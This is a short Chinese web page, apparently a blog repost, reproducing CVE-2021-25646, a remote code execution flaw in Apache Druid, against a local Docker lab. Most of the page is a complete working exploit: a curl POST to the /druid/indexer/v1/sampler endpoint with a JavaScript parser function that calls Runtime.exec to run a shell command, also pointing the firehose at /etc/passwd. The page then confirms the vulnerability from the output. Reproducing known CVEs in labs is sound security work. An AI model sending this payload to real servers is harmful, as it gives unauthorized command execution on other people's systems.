当前位置：首页 > news >正文

CVE-2021-25646 Apache Druid 远程代码执行漏洞 (复现)

news 2025/9/15 19:35:23

CVE-2021-25646目录终端下执行docker compose up -d开启容器访问your-ip:8888

发送恶意请求
向目标服务器发送如下 POST 请求，其中包含执行任意命令的 JavaScript 代码
curl -X POST "http://192.168.75.132:8888/druid/indexer/v1/sampler" -H "Host: 192.168.75.132:8888" -H "Accept-Encoding: gzip, deflate" -H "Accept: */*" -H "Accept-Language: en-US;q=0.9,en;q=0.8" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36" -H "Connection: close" -H "Cache-Control: max-age=0" -H "Content-Type: application/json" -d '{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/etc","filter":"passwd"}},"dataSchema":{"dataSource":"test","parser":{"parseSpec":{"format":"javascript","timestampSpec":{},"dimensionsSpec":{},"function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\\\A\").next();return {timestamp:123123,test: a}}","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":10}}' -o result.txt
后cat result.txt查看文件

运行成功！该漏洞存在

http://www.vanclimg.com/news/134.html

相关文章：

9N90-ASEMI工业驱动专用9N90

我的 10 级 Claude Code 速查表让你几分钟内变专家（你现在是第几级？）

Docker容器服务端口探测 - Leonardo

Docker搭建Hadoop集群

总结与计划 7.28

Inventory System Plugin

联邦学习中的持续学习技术

CHO细胞抗体表达｜重组抗体纯化｜高效抗体生产

（阶段二：落地） CMS 模板系统核心数据结构与流程梳理（SceneStack）

CAXA3D 实体设计2025最新版本下载安装图文教程，一键快速安装激活

前端开发者的利器：6款最强类EXCEL表格插件对比，轻松实现Excel级交互

软考系统分析师每日学习卡 | [日期：2025-07-28] | [今日主题：操作系统概述]

xshell的正则表达式

Linux查看PCIe版本及速率

盈鹏飞嵌入式带你玩转T113系列tina5 SDK(7)-使用ADB来传输文件

CLion与Beta版：使用Unicode UTF-8提供全球语言支持

PowerShell脚本执行打包命令

盈鹏飞嵌入式带你玩转T113系列tina5 SDK(6)-添加心跳灯

“轻”是态度，“强”是底气：折叠屏的“成人礼”

zip伪加密writeup

25_1 C++函数参数传递方式

annocanda配置一个python环境的案例

wsl2 非系统盘下安装ubuntu22.04的极简方法

盈鹏飞嵌入式带你玩转T113系列tina5 SDK(4)-如何适配自己的开发板

盈鹏飞嵌入式带你玩转T113系列tina5 SDK(5)-Uboot单独编译

使用Python和Gradio构建基于OpenAI GPT-4的AI聊天机器人

19C++循环结构-多重循环（2）

数据库计算机三级等级考试–网络技术